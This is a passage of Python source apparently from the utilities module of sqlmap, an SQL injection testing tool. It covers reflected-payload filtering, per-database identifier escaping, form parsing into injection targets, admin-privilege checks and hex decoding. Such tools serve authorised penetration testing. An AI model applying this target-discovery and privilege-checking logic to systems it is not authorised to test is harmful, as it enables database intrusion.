REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)\n                return value\n\n            payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, \"\"), convall=True))\n            regex = _(filterStringValue(payload, r\"[A-Za-z0-9]\", encodeStringEscape(REFLECTED_REPLACEMENT_REGEX)))\n\n            if regex != payload:\n                if all(part.lower() in content.lower() for part in filterNone(regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]):  # fast optimization check\n                    parts = regex.split(REFLECTED_REPLACEMENT_REGEX)\n\n                    # Note: naive approach\n                    retVal = content.replace(payload, REFLECTED_VALUE_MARKER)\n                    retVal = retVal.replace(re.sub(r\"\\A\\w+\", \"\", payload), REFLECTED_VALUE_MARKER)\n\n                    if len(parts) > REFLECTED_MAX_REGEX_PARTS:  # preventing CPU hogs\n                        regex = _(\"%s%s%s\" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS // 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS // 2:])))\n\n                    parts = filterNone(regex.split(REFLECTED_REPLACEMENT_REGEX))\n\n                    if regex.startswith(REFLECTED_REPLACEMENT_REGEX):\n                        regex = r\"%s%s\" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):])\n                    else:\n                        regex = r\"\\b%s\" % regex\n\n                    if regex.endswith(REFLECTED_REPLACEMENT_REGEX):\n                        regex = r\"%s%s\" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX)\n                    else:\n                        regex = r\"%s\\b\" % regex\n\n                    _retVal = [retVal]\n\n                    def _thread(regex):\n                        try:\n                            _retVal[0] = re.sub(r\"(?i)%s\" % regex, REFLECTED_VALUE_MARKER, _retVal[0])\n\n                            if len(parts) > 2:\n                                regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])\n                                _retVal[0] = re.sub(r\"(?i)\\b%s\\b\" % regex, REFLECTED_VALUE_MARKER, _retVal[0])\n                        except KeyboardInterrupt:\n                            raise\n                        except:\n                            pass\n\n                    thread = threading.Thread(target=_thread, args=(regex,))\n                    thread.daemon = True\n                    thread.start()\n                    thread.join(REFLECTED_REPLACEMENT_TIMEOUT)\n\n                    if thread.is_alive():\n                        kb.reflectiveMechanism = False\n                        retVal = content\n                        if not suppressWarning:\n                            debugMsg = \"turning off reflection removal mechanism (because of timeouts)\"\n                            logger.debug(debugMsg)\n                    else:\n                        retVal = _retVal[0]\n\n                if retVal != content:\n                    kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1\n                    if not suppressWarning:\n                        warnMsg = \"reflective value(s) found and filtering out\"\n                        singleTimeWarnMessage(warnMsg)\n\n                    if re.search(r\"(?i)FRAME[^>]+src=[^>]*%s\" % REFLECTED_VALUE_MARKER, retVal):\n                        warnMsg = \"frames detected containing attacked parameter values. Please be sure to \"\n                        warnMsg += \"test those separately in case that attack on this page fails\"\n                        singleTimeWarnMessage(warnMsg)\n\n                elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]:\n                    kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1\n                    if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD:\n                        kb.reflectiveMechanism = False\n                        if not suppressWarning:\n                            debugMsg = \"turning off reflection removal mechanism (for optimization purposes)\"\n                            logger.debug(debugMsg)\n\n    except (MemoryError, SystemError):\n        kb.reflectiveMechanism = False\n        if not suppressWarning:\n            debugMsg = \"turning off reflection removal mechanism\"\n            logger.debug(debugMsg)\n\n    return retVal\n\ndef normalizeUnicode(value, charset=string.printable[:string.printable.find(' ') + 1]):\n    \"\"\"\n    Does an ASCII normalization of unicode strings\n\n    # Reference: http://www.peterbe.com/plog/unicode-to-ascii\n\n    >>> normalizeUnicode(u'\\\\u0161u\\\\u0107uraj') == u'sucuraj'\n    True\n    >>> normalizeUnicode(getUnicode(decodeHex(\"666f6f00626172\"))) == u'foobar'\n    True\n    \"\"\"\n\n    retVal = value\n\n    if isinstance(value, six.text_type):\n        retVal = unicodedata.normalize(\"NFKD\", value)\n        retVal = \"\".join(_ for _ in retVal if _ in charset)\n\n    return retVal\n\ndef safeSQLIdentificatorNaming(name, isTable=False):\n    \"\"\"\n    Returns a safe representation of SQL identificator name (internal data format)\n\n    # Reference: http://stackoverflow.com/questions/954884/what-special-characters-are-allowed-in-t-sql-column-retVal\n\n    >>> pushValue(kb.forcedDbms)\n    >>> kb.forcedDbms = DBMS.MSSQL\n    >>> getText(safeSQLIdentificatorNaming(\"begin\"))\n    '[begin]'\n    >>> getText(safeSQLIdentificatorNaming(\"foobar\"))\n    'foobar'\n    >>> kb.forceDbms = popValue()\n    \"\"\"\n\n    retVal = name\n\n    if isinstance(name, six.string_types):\n        retVal = getUnicode(name)\n        _ = isTable and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE)\n\n        if _:\n            retVal = re.sub(r\"(?i)\\A\\[?%s\\]?\\.\" % DEFAULT_MSSQL_SCHEMA, \"%s.\" % DEFAULT_MSSQL_SCHEMA, retVal)\n\n        # Note: SQL 92 has restrictions for identifiers starting with underscore (e.g. http://www.frontbase.com/documentation/FBUsers_4.pdf)\n        if retVal.upper() in kb.keywords or (not isTable and (retVal or \" \")[0] == '_') or (retVal or \" \")[0].isdigit() or not re.match(r\"\\A[A-Za-z0-9_@%s\\$]+\\Z\" % ('.' if _ else \"\"), retVal):  # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal)\n            if not conf.noEscape:\n                retVal = unsafeSQLIdentificatorNaming(retVal)\n\n                if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE):  # Note: in SQLite double-quotes are treated as string if column/identifier is non-existent (e.g. SELECT \"foobar\" FROM users)\n                    retVal = \"`%s`\" % retVal\n                elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX, DBMS.MONETDB, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO):\n                    retVal = \"\\\"%s\\\"\" % retVal\n                elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.ALTIBASE, DBMS.MIMERSQL):\n                    retVal = \"\\\"%s\\\"\" % retVal.upper()\n                elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):\n                    if isTable:\n                        parts = retVal.split('.', 1)\n                        for i in xrange(len(parts)):\n                            if parts[i] and (re.search(r\"\\A\\d|[^\\w]\", parts[i], re.U) or parts[i].upper() in kb.keywords):\n                                parts[i] = \"[%s]\" % parts[i]\n                        retVal = '.'.join(parts)\n                    else:\n                        if re.search(r\"\\A\\d|[^\\w]\", retVal, re.U) or retVal.upper() in kb.keywords:\n                            retVal = \"[%s]\" % retVal\n\n        if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r\"\\[[^]]+\\]\", \"\", retVal):\n            retVal = \"%s.%s\" % (DEFAULT_MSSQL_SCHEMA, retVal)\n\n    return retVal\n\ndef unsafeSQLIdentificatorNaming(name):\n    \"\"\"\n    Extracts identificator's name from its safe SQL representation\n\n    >>> pushValue(kb.forcedDbms)\n    >>> kb.forcedDbms = DBMS.MSSQL\n    >>> getText(unsafeSQLIdentificatorNaming(\"[begin]\"))\n    'begin'\n    >>> getText(unsafeSQLIdentificatorNaming(\"foobar\"))\n    'foobar'\n    >>> kb.forceDbms = popValue()\n    \"\"\"\n\n    retVal = name\n\n    if isinstance(name, six.string_types):\n        if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE):\n            retVal = name.replace(\"`\", \"\")\n        elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX, DBMS.MONETDB, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO):\n            retVal = name.replace(\"\\\"\", \"\")\n        elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.ALTIBASE, DBMS.MIMERSQL):\n            retVal = name.replace(\"\\\"\", \"\").upper()\n        elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):\n            retVal = name.replace(\"[\", \"\").replace(\"]\", \"\")\n\n        if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):\n            retVal = re.sub(r\"(?i)\\A\\[?%s\\]?\\.\" % DEFAULT_MSSQL_SCHEMA, \"\", retVal)\n\n    return retVal\n\ndef isNoneValue(value):\n    \"\"\"\n    Returns whether the value is unusable (None or '')\n\n    >>> isNoneValue(None)\n    True\n    >>> isNoneValue('None')\n    True\n    >>> isNoneValue('')\n    True\n    >>> isNoneValue([])\n    True\n    >>> isNoneValue([2])\n    False\n    \"\"\"\n\n    if isinstance(value, six.string_types):\n        return value in (\"None\", \"\")\n    elif isListLike(value):\n        return all(isNoneValue(_) for _ in value)\n    elif isinstance(value, dict):\n        return not any(value)\n    else:\n        return value is None\n\ndef isNullValue(value):\n    \"\"\"\n    Returns whether the value contains explicit 'NULL' value\n\n    >>> isNullValue(u'NULL')\n    True\n    >>> isNullValue(u'foobar')\n    False\n    \"\"\"\n\n    return hasattr(value, \"upper\") and value.upper() == NULL\n\ndef expandMnemonics(mnemonics, parser, args):\n    \"\"\"\n    Expands mnemonic options\n    \"\"\"\n\n    class MnemonicNode(object):\n        def __init__(self):\n            self.next = {}\n            self.current = []\n\n    head = MnemonicNode()\n    pointer = None\n\n    for group in parser.option_groups:\n        for option in group.option_list:\n            for opt in option._long_opts + option._short_opts:\n                pointer = head\n\n                for char in opt:\n                    if char == \"-\":\n                        continue\n                    elif char not in pointer.next:\n                        pointer.next[char] = MnemonicNode()\n\n                    pointer = pointer.next[char]\n                    pointer.current.append(option)\n\n    for mnemonic in (mnemonics or \"\").split(','):\n        found = None\n        name = mnemonic.split('=')[0].replace('-', \"\").strip()\n        value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None\n        pointer = head\n\n        for char in name:\n            if char in pointer.next:\n                pointer = pointer.next[char]\n            else:\n                pointer = None\n                break\n\n        if pointer in (None, head):\n            errMsg = \"mnemonic '%s' can't be resolved to any parameter name\" % name\n            raise SqlmapSyntaxException(errMsg)\n\n        elif len(pointer.current) > 1:\n            options = {}\n\n            for option in pointer.current:\n                for opt in option._long_opts + option._short_opts:\n                    opt = opt.strip('-')\n                    if opt.startswith(name):\n                        options[opt] = option\n\n            if not options:\n                warnMsg = \"mnemonic '%s' can't be resolved\" % name\n                logger.warning(warnMsg)\n            elif name in options:\n                found = name\n                debugMsg = \"mnemonic '%s' resolved to %s). \" % (name, found)\n                logger.debug(debugMsg)\n            else:\n                found = sorted(options.keys(), key=len)[0]\n                warnMsg = \"detected ambiguity (mnemonic '%s' can be resolved to any of: %s). \" % (name, \", \".join(\"'%s'\" % key for key in options))\n                warnMsg += \"Resolved to shortest of those ('%s')\" % found\n                logger.warning(warnMsg)\n\n            if found:\n                found = options[found]\n        else:\n            found = pointer.current[0]\n            debugMsg = \"mnemonic '%s' resolved to %s). \" % (name, found)\n            logger.debug(debugMsg)\n\n        if found:\n            try:\n                value = found.convert_value(found, value)\n            except OptionValueError:\n                value = None\n\n            if value is not None:\n                setattr(args, found.dest, value)\n            elif not found.type:  # boolean\n                setattr(args, found.dest, True)\n            else:\n                errMsg = \"mnemonic '%s' requires value of type '%s'\" % (name, found.type)\n                raise SqlmapSyntaxException(errMsg)\n\ndef safeCSValue(value):\n    \"\"\"\n    Returns value safe for CSV dumping\n\n    # Reference: http://tools.ietf.org/html/rfc4180\n\n    >>> safeCSValue('foo, bar')\n    '\"foo, bar\"'\n    >>> safeCSValue('foobar')\n    'foobar'\n    \"\"\"\n\n    retVal = value\n\n    if retVal and isinstance(retVal, six.string_types):\n        if not (retVal[0] == retVal[-1] == '\"'):\n            if any(_ in retVal for _ in (conf.get(\"csvDel\", defaults.csvDel), '\"', '\\n')):\n                retVal = '\"%s\"' % retVal.replace('\"', '\"\"')\n\n    return retVal\n\ndef filterPairValues(values):\n    \"\"\"\n    Returns only list-like values with length 2\n\n    >>> filterPairValues([[1, 2], [3], 1, [4, 5]])\n    [[1, 2], [4, 5]]\n    \"\"\"\n\n    retVal = []\n\n    if not isNoneValue(values) and hasattr(values, '__iter__'):\n        retVal = [value for value in values if isinstance(value, (tuple, list, set)) and len(value) == 2]\n\n    return retVal\n\ndef randomizeParameterValue(value):\n    \"\"\"\n    Randomize a parameter value based on occurrences of alphanumeric characters\n\n    >>> random.seed(0)\n    >>> randomizeParameterValue('foobar')\n    'fupgpy'\n    >>> randomizeParameterValue('17')\n    '36'\n    \"\"\"\n\n    retVal = value\n\n    value = re.sub(r\"%[0-9a-fA-F]{2}\", \"\", value)\n\n    for match in re.finditer(r\"[A-Z]+\", value):\n        while True:\n            original = match.group()\n            candidate = randomStr(len(match.group())).upper()\n            if original != candidate:\n                break\n\n        retVal = retVal.replace(original, candidate)\n\n    for match in re.finditer(r\"[a-z]+\", value):\n        while True:\n            original = match.group()\n            candidate = randomStr(len(match.group())).lower()\n            if original != candidate:\n                break\n\n        retVal = retVal.replace(original, candidate)\n\n    for match in re.finditer(r\"[0-9]+\", value):\n        while True:\n            original = match.group()\n            candidate = str(randomInt(len(match.group())))\n            if original != candidate:\n                break\n\n        retVal = retVal.replace(original, candidate)\n\n    if re.match(r\"\\A[^@]+@.+\\.[a-z]+\\Z\", value):\n        parts = retVal.split('.')\n        parts[-1] = random.sample(RANDOMIZATION_TLDS, 1)[0]\n        retVal = '.'.join(parts)\n\n    if not retVal:\n        retVal = randomStr(lowercase=True)\n\n    return retVal\n\n@cachedmethod\ndef asciifyUrl(url, forceQuote=False):\n    \"\"\"\n    Attempts to make a unicode URL usable with ``urllib/urllib2``.\n\n    More specifically, it attempts to convert the unicode object ``url``,\n    which is meant to represent a IRI, to an unicode object that,\n    containing only ASCII characters, is a valid URI. This involves:\n\n        * IDNA/Puny-encoding the domain name.\n        * UTF8-quoting the path and querystring parts.\n\n    See also RFC 3987.\n\n    # Reference: http://blog.elsdoerfer.name/2008/12/12/opening-iris-in-python/\n\n    >>> asciifyUrl(u'http://www.\\\\u0161u\\\\u0107uraj.com')\n    'http://www.xn--uuraj-gxa24d.com'\n    \"\"\"\n\n    parts = _urllib.parse.urlsplit(url)\n    if not all((parts.scheme, parts.netloc, parts.hostname)):\n        # apparently not an url\n        return getText(url)\n\n    if all(char in string.printable for char in url):\n        return getText(url)\n\n    hostname = parts.hostname\n\n    if isinstance(hostname, six.binary_type):\n        hostname = getUnicode(hostname)\n\n    # idna-encode domain\n    try:\n        hostname = hostname.encode(\"idna\")\n    except:\n        hostname = hostname.encode(\"punycode\")\n\n    # UTF8-quote the other parts. We check each part individually if\n    # if needs to be quoted - that should catch some additional user\n    # errors, say for example an umlaut in the username even though\n    # the path *is* already quoted.\n    def quote(s, safe):\n        s = s or ''\n        # Triggers on non-ascii characters - another option would be:\n        #     _urllib.parse.quote(s.replace('%', '')) != s.replace('%', '')\n        # which would trigger on all %-characters, e.g. \"&\".\n        if getUnicode(s).encode(\"ascii\", \"replace\") != s or forceQuote:\n            s = _urllib.parse.quote(getBytes(s), safe=safe)\n        return s\n\n    username = quote(parts.username, '')\n    password = quote(parts.password, safe='')\n    path = quote(parts.path, safe='/')\n    query = quote(parts.query, safe=\"&=\")\n\n    # put everything back together\n    netloc = getText(hostname)\n    if username or password:\n        netloc = '@' + netloc\n        if password:\n            netloc = ':' + password + netloc\n        netloc = username + netloc\n\n    try:\n        port = parts.port\n    except:\n        port = None\n\n    if port:\n        netloc += ':' + str(port)\n\n    return getText(_urllib.parse.urlunsplit([parts.scheme, netloc, path, query, parts.fragment]) or url)\n\ndef isAdminFromPrivileges(privileges):\n    \"\"\"\n    Inspects privileges to see if those are coming from an admin user\n    \"\"\"\n\n    privileges = privileges or []\n\n    # In PostgreSQL the usesuper privilege means that the\n    # user is DBA\n    retVal = (Backend.isDbms(DBMS.PGSQL) and \"super\" in privileges)\n\n    # In Oracle the DBA privilege means that the\n    # user is DBA\n    retVal |= (Backend.isDbms(DBMS.ORACLE) and \"DBA\" in privileges)\n\n    # In MySQL >= 5.0 the SUPER privilege means\n    # that the user is DBA\n    retVal |= (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema and \"SUPER\" in privileges)\n\n    # In MySQL < 5.0 the super_priv privilege means\n    # that the user is DBA\n    retVal |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema and \"super_priv\" in privileges)\n\n    # In Firebird there is no specific privilege that means\n    # that the user is DBA\n    retVal |= (Backend.isDbms(DBMS.FIREBIRD) and all(_ in privileges for _ in (\"SELECT\", \"INSERT\", \"UPDATE\", \"DELETE\", \"REFERENCES\", \"EXECUTE\")))\n\n    return retVal\n\ndef findPageForms(content, url, raise_=False, addToTargets=False):\n    \"\"\"\n    Parses given page content for possible forms (Note: still not implemented for Python3)\n\n    >>> findPageForms('<html><form action=\"/input.php\" method=\"POST\"><input type=\"text\" name=\"id\" value=\"1\"><input type=\"submit\" value=\"Submit\"></form></html>', 'http://www.site.com') == set([('http://www.site.com/input.php', 'POST', 'id=1', None, None)])\n    True\n    \"\"\"\n\n    class _(six.StringIO, object):\n        def __init__(self, content, url):\n            super(_, self).__init__(content)\n            self._url = url\n\n        def geturl(self):\n            return self._url\n\n    if not content:\n        errMsg = \"can't parse forms as the page content appears to be blank\"\n        if raise_:\n            raise SqlmapGenericException(errMsg)\n        else:\n            logger.debug(errMsg)\n\n    forms = None\n    retVal = set()\n    response = _(content, url)\n\n    try:\n        forms = ParseResponse(response, backwards_compat=False)\n    except ParseError:\n        if re.search(r\"(?i)<!DOCTYPE html|<html\", content or \"\") and not re.search(r\"(?i)\\.js(\\?|\\Z)\", url):\n            dbgMsg = \"badly formed HTML at the given URL ('%s'). Going to filter it\" % url\n            logger.debug(dbgMsg)\n            filtered = _(\"\".join(re.findall(FORM_SEARCH_REGEX, content)), url)\n\n            if filtered and filtered != content:\n                try:\n                    forms = ParseResponse(filtered, backwards_compat=False)\n                except:\n                    errMsg = \"no success\"\n                    if raise_:\n                        raise SqlmapGenericException(errMsg)\n                    else:\n                        logger.debug(errMsg)\n    except:\n        pass\n\n    for form in forms or []:\n        try:\n            for control in form.controls:\n                if hasattr(control, \"items\") and not any((control.disabled, control.readonly)):\n                    # if control has selectable items select first non-disabled\n                    for item in control.items:\n                        if not item.disabled:\n                            if not item.selected:\n                                item.selected = True\n                            break\n\n            if conf.crawlExclude and re.search(conf.crawlExclude, form.action or \"\"):\n                dbgMsg = \"skipping '%s'\" % form.action\n                logger.debug(dbgMsg)\n                continue\n\n            request = form.click()\n        except (ValueError, TypeError) as ex:\n            errMsg = \"there has been a problem while \"\n            errMsg += \"processing page forms ('%s')\" % getSafeExString(ex)\n            if raise_:\n                raise SqlmapGenericException(errMsg)\n            else:\n                logger.debug(errMsg)\n        else:\n            url = urldecode(request.get_full_url(), kb.pageEncoding)\n            method = request.get_method()\n            data = unArrayizeValue(request.data)\n            data = urldecode(data, kb.pageEncoding, spaceplus=False)\n\n            if not data and method and method.upper() == HTTPMETHOD.POST:\n                debugMsg = \"invalid POST form with blank data detected\"\n                logger.debug(debugMsg)\n                continue\n\n            # flag to know if we are dealing with the same target host\n            _ = checkSameHost(response.geturl(), url)\n\n            if data:\n                data = data.lstrip(\"&=\").rstrip('&')\n\n            if conf.scope and not re.search(conf.scope, url, re.I):\n                continue\n            elif data and not re.sub(r\"(%s)=[^&]*&?\" % '|'.join(IGNORE_PARAMETERS), \"\", data):\n                continue\n            elif not _:\n                continue\n            else:\n                target = (url, method, data, conf.cookie, None)\n                retVal.add(target)\n\n    for match in re.finditer(r\"\\.post\\(['\\\"]([^'\\\"]*)['\\\"],\\s*\\{([^}]*)\\}\", content):\n        url = _urllib.parse.urljoin(url, htmlUnescape(match.group(1)))\n        data = \"\"\n\n        for name, value in re.findall(r\"['\\\"]?(\\w+)['\\\"]?\\s*:\\s*(['\\\"][^'\\\"]+)?\", match.group(2)):\n            data += \"%s=%s%s\" % (name, value, DEFAULT_GET_POST_DELIMITER)\n\n        data = data.rstrip(DEFAULT_GET_POST_DELIMITER)\n        retVal.add((url, HTTPMETHOD.POST, data, conf.cookie, None))\n\n    for match in re.finditer(r\"(?s)(\\w+)\\.open\\(['\\\"]POST['\\\"],\\s*['\\\"]([^'\\\"]+)['\\\"]\\).*?\\1\\.send\\(([^)]+)\\)\", content):\n        url = _urllib.parse.urljoin(url, htmlUnescape(match.group(2)))\n        data = match.group(3)\n\n        data = re.sub(r\"\\s*\\+\\s*[^\\s'\\\"]+|[^\\s'\\\"]+\\s*\\+\\s*\", \"\", data)\n\n        data = data.strip(\"['\\\"]\")\n        retVal.add((url, HTTPMETHOD.POST, data, conf.cookie, None))\n\n    if not retVal and not conf.crawlDepth:\n        errMsg = \"there were no forms found at the given target URL\"\n        if raise_:\n            raise SqlmapGenericException(errMsg)\n        else:\n            logger.debug(errMsg)\n\n    if addToTargets and retVal:\n        for target in retVal:\n            kb.targets.add(target)\n\n    return retVal\n\ndef checkSameHost(*urls):\n    \"\"\"\n    Returns True if all provided urls share that same host\n\n    >>> checkSameHost('http://www.target.com/page1.php?id=1', 'http://www.target.com/images/page2.php')\n    True\n    >>> checkSameHost('http://www.target.com/page1.php?id=1', 'http://www.target2.com/images/page2.php')\n    False\n    \"\"\"\n\n    if not urls:\n        return None\n    elif len(urls) == 1:\n        return True\n    else:\n        def _(value):\n            if value and not re.search(r\"\\A\\w+://\", value):\n                value = \"http://%s\" % value\n            return value\n\n        return all(re.sub(r\"(?i)\\Awww\\.\", \"\", _urllib.parse.urlparse(_(url) or \"\").netloc.split(':')[0]) == re.sub(r\"(?i)\\Awww\\.\", \"\", _urllib.parse.urlparse(_(urls[0]) or \"\").netloc.split(':')[0]) for url in urls[1:])\n\ndef getHostHeader(url):\n    \"\"\"\n    Returns proper Host header value for a given target URL\n\n    >>> getHostHeader('http://www.target.com/vuln.php?id=1')\n    'www.target.com'\n    \"\"\"\n\n    retVal = url\n\n    if url:\n        retVal = _urllib.parse.urlparse(url).netloc\n\n        if re.search(r\"http(s)?://\\[.+\\]\", url, re.I):\n            retVal = extractRegexResult(r\"http(s)?://\\[(?P<result>.+)\\]\", url)\n        elif any(retVal.endswith(':%d' % _) for _ in (80, 443)):\n            retVal = retVal.split(':')[0]\n\n    if retVal and retVal.count(':') > 1 and not any(_ in retVal for _ in ('[', ']')):\n        retVal = \"[%s]\" % retVal\n\n    return retVal\n\ndef checkOldOptions(args):\n    \"\"\"\n    Checks for obsolete/deprecated options\n    \"\"\"\n\n    for _ in args:\n        _ = _.split('=')[0].strip()\n        if _ in OBSOLETE_OPTIONS:\n            errMsg = \"switch/option '%s' is obsolete\" % _\n            if OBSOLETE_OPTIONS[_]:\n                errMsg += \" (hint: %s)\" % OBSOLETE_OPTIONS[_]\n            raise SqlmapSyntaxException(errMsg)\n        elif _ in DEPRECATED_OPTIONS:\n            warnMsg = \"switch/option '%s' is deprecated\" % _\n            if DEPRECATED_OPTIONS[_]:\n                warnMsg += \" (hint: %s)\" % DEPRECATED_OPTIONS[_]\n            logger.warning(warnMsg)\n\ndef checkSystemEncoding():\n    \"\"\"\n    Checks for problematic encodings\n    \"\"\"\n\n    if sys.getdefaultencoding() == \"cp720\":\n        try:\n            codecs.lookup(\"cp720\")\n        except LookupError:\n            errMsg = \"there is a known Python issue (#1616979) related \"\n            errMsg += \"to support for charset 'cp720'. Please visit \"\n            errMsg += \"'http://blog.oneortheother.info/tip/python-fix-cp720-encoding/index.html' \"\n            errMsg += \"and follow the instructions to be able to fix it\"\n            logger.critical(errMsg)\n\n            warnMsg = \"temporary switching to charset 'cp1256'\"\n            logger.warning(warnMsg)\n\n            _reload_module(sys)\n            sys.setdefaultencoding(\"cp1256\")\n\ndef evaluateCode(code, variables=None):\n    \"\"\"\n    Executes given python code given in a string form\n\n    >>> _ = {}; evaluateCode(\"a = 1; b = 2; c = a\", _); _[\"c\"]\n    1\n    \"\"\"\n\n    try:\n        exec(code, variables)\n    except KeyboardInterrupt:\n        raise\n    except Exception as ex:\n        errMsg = \"an error occurred while evaluating provided code ('%s') \" % getSafeExString(ex)\n        raise SqlmapGenericException(errMsg)\n\ndef serializeObject(object_):\n    \"\"\"\n    Serializes given object\n\n    >>> type(serializeObject([1, 2, 3, ('a', 'b')])) == str\n    True\n    \"\"\"\n\n    return base64pickle(object_)\n\ndef unserializeObject(value):\n    \"\"\"\n    Unserializes object from given serialized form\n\n    >>> unserializeObject(serializeObject([1, 2, 3])) == [1, 2, 3]\n    True\n    >>> unserializeObject('gAJVBmZvb2JhcnEBLg==')\n    'foobar'\n    \"\"\"\n\n    return base64unpickle(value) if value else None\n\ndef resetCounter(technique):\n    \"\"\"\n    Resets query counter for a given technique\n    \"\"\"\n\n    kb.counters[technique] = 0\n\ndef incrementCounter(technique):\n    \"\"\"\n    Increments query counter for a given technique\n    \"\"\"\n\n    kb.counters[technique] = getCounter(technique) + 1\n\ndef getCounter(technique):\n    \"\"\"\n    Returns query counter for a given technique\n\n    >>> resetCounter(PAYLOAD.TECHNIQUE.STACKED); incrementCounter(PAYLOAD.TECHNIQUE.STACKED); getCounter(PAYLOAD.TECHNIQUE.STACKED)\n    1\n    \"\"\"\n\n    return kb.counters.get(technique, 0)\n\ndef applyFunctionRecursively(value, function):\n    \"\"\"\n    Applies function recursively through list-like structures\n\n    >>> applyFunctionRecursively([1, 2, [3, 4, [19]], -9], lambda _: _ > 0)\n    [True, True, [True, True, [True]], False]\n    \"\"\"\n\n    if isListLike(value):\n        retVal = [applyFunctionRecursively(_, function) for _ in value]\n    else:\n        retVal = function(value)\n\n    return retVal\n\ndef decodeDbmsHexValue(value, raw=False):\n    \"\"\"\n    Returns value decoded from DBMS specific hexadecimal representation\n\n    >>> decodeDbmsHexValue('3132332031') == u'123 1'\n    True\n    >>> decodeDbmsHexValue('313233203') == u'123 ?'\n    True\n    >>> decodeDbmsHexValue(['0x31', '0x32']) == [u'1', u'2']\n    True\n    >>> decodeDbmsHexValue('5.1.41') == u'5.1.41'\n    True\n    \"\"\"\n\n    retVal = value\n\n    def _(value):\n        retVal = value\n        if value and isinstance(value, six.string_types):\n            value = value.strip()\n\n            if len(value) % 2 != 0:\n                retVal = (decodeHex(value[:-1]) + b'?') if len(value) > 1 else value\n                singleTimeWarnMessage(\"there was a problem decoding value '%s' from expected hexadecimal form\" % value)\n            else:\n                retVal = decodeHex(value)\n\n            if not raw:\n                if not kb.binaryField:\n                    if Backend.isDbms(DBMS.MSSQL) and value.startswith(\"0x\"):\n                        try:\n                            retVal = retVal.decode(\"utf-16-le\")\n                        except UnicodeDecodeError:\n                            pass\n\n                    elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.H2):\n                        try:\n                            retVal = retVal.decode(\"utf-16-be\")\n                        except UnicodeDecodeError:\n                            pass\n\n                if not isinstance(retVal, six.text_type):\n                    retVal = getUnicode(retVal, conf.encoding or UNICODE_ENCODING)\n\n        return retVal\n\n    try:\n        retVal = applyFunctionRecursively(value, _)\n    except:\n        singleTimeWarnMessage(\"there was a problem decoding value '%s' from expected hexadecimal form\" % value)\n\n    return retVal\n\ndef extractExpectedValue(value, expected):\n    \"\"\"\n    Extracts and returns expected value by a given type\n\n    >>> extractExpectedValue(['1'], EXPECTED.BOOL)\n    True\n    >>> extractExpectedValue('1', EXPECTED.INT)\n    1\n    >>> extractExpectedValue('7\\\\xb9645', EXPECTED.INT) is None\n    True\n    \"\"\"\n\n    if expected:\n        value = unArrayizeValue(value)\n\n        if isNoneValue(value):\n            value = None\n        elif expected == EXPECTED.BOOL:\n            if isinstance(value, int):\n                value = bool(value)\n            elif isinstance(value, six.string_types):\n                value = value.strip().lower()\n                if value in (\"true\", \"false\"):\n                    value = value == \"true\"\n                elif value in ('t', 'f'):\n                    value = value == 't'\n                elif value in (\"1\", \"-1\"):\n                    value = True\n                elif value == '0':\n                    value = False\n                else:\n                    value = None\n        elif expected == EXPECTED.INT:\n            try:\n                value = int(value)\n            except:\n                value = None\n\n    return value\n\ndef hashDBWrite(key, value, serialize=False):\n    \"\"\"\n    Helper function for writing session data to HashDB\n    \"\"\"\n\n    if conf.hashDB:\n        _ = '|'.join((str(_) if not isinstance(_, six.string_types) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE))\n        conf.hashDB.write(_, value, serialize)\n\ndef hashDBRetrieve(key, unserialize=False, checkConf=False):\n    \"\"\"\n    Helper function for restoring session data from HashDB\n    \"\"\"\n\n    retVal = None\n\n    if conf.hashDB:\n        _ = '|'.join((str(_) if not isinstance(_, six.string_types) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE))\n        retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None\n\n        if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, six.string_types) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, 